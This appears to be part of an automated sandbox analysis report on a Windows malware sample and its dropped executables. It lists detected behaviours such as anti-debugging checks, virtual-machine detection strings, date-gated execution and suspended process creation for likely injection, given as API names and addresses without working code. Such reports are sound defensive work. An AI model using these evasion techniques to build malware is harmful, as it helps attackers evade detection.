Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

File opened: PhysicalDrive0

Jump to behavior

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h		6_2_100223C0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h		6_2_100223C0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h		15_2_100223C0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h		15_2_100223C0

Checks the free space of harddrives

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8D1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,		0_2_6D8D1C23
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,		0_2_6D8E0F62
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AA534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		1_2_008AA534
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BB820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		1_2_008BB820
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CA928 FindFirstFileExA,		1_2_008CA928
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00402D09 FindFirstFileA,		6_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		6_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_004066CC FindFirstFileA,FindClose,		6_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001A170 FindFirstFileA,FindClose,		6_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05867950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,		15_2_05867950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05865A90 FindFirstFileA,FindClose,		15_2_05865A90
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001A170 FindFirstFileA,FindClose,		15_2_1001A170

Contains functionality to query system information

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008BDBC8 VirtualQuery,GetSystemInfo,SetShellWindowEx,

1_2_008BDBC8

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1014319310.0000000004DDD000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998392579.00000000050DD000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1000246980.00000000050E0000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}X
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998413143.00000000050D6000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter}
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW Area Connection* 6
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998392579.00000000050DD000.00000004.00000001.sdmp	Binary or memory string: BatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1000246980.00000000050E0000.00000004.00000001.sdmp	Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998392579.00000000050DD000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1007464844.0000000000194000.00000004.00000001.sdmp	Binary or memory string: VMware Virtual disk 2.0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1007464844.0000000000194000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009586899.00000000042A8000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1000246980.00000000050E0000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,

6_2_10019FF0

Hides threads from debuggers

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Thread information set: HideFromDebugger

Jump to behavior

Checks if the current process is being debugged

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugFlags			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8E52CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6D8E52CE

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8D041D OutputDebugStringA,GetLastError,

0_2_6D8D041D

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8F2571 mov eax, dword ptr fs:[00000030h]		0_2_6D8F2571
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8F80EB mov eax, dword ptr fs:[00000030h]		0_2_6D8F80EB
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C7363 mov eax, dword ptr fs:[00000030h]		1_2_008C7363
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00404C06 mov eax, dword ptr fs:[00000030h]		6_2_00404C06
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019DE0 mov eax, dword ptr fs:[00000030h]		6_2_10019DE0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E10 mov eax, dword ptr fs:[00000030h]		6_2_10019E10
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E10 mov eax, dword ptr fs:[00000030h]		6_2_10019E10
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]		6_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]		6_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]		6_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019DE0 mov eax, dword ptr fs:[00000030h]		15_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E10 mov eax, dword ptr fs:[00000030h]		15_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E10 mov eax, dword ptr fs:[00000030h]		15_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E70 mov eax, dword ptr fs:[00000030h]		15_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E70 mov eax, dword ptr fs:[00000030h]		15_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019ED0 mov eax, dword ptr fs:[00000030h]		15_2_10019ED0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8B1660 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,CloseHandle,GetProcessHeap,HeapFree,

0_2_6D8B1660

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Process created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s

Jump to behavior

Contains functionality to register its own exception handler

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8DFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6D8DFB78
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E52CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6D8E52CE
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BEEB3 SetUnhandledExceptionFilter,		1_2_008BEEB3
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BF07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_008BF07B
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C84EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_008C84EF
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_008BED65
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_0040825D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_0040825D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,		6_2_10015354
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,		6_2_10015376
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,		6_2_10018413
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_1000E44D
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05748D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		15_2_05748D22
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05746CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		15_2_05746CE8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05743315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		15_2_05743315
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,		15_2_10015354
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,		15_2_10015376
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,		15_2_10018413
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		15_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		15_2_1000EFFC

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'

Jump to behavior

Contains functionality to add an ACL to a security descriptor

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

6_2_1001A0F0

May try to detect the Windows Explorer process (often used for injection)

Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008BEBBB cpuid

1_2_008BEBBB

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		1_2_008BA5BC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: GetLocaleInfoA,		6_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,		15_2_05755D79
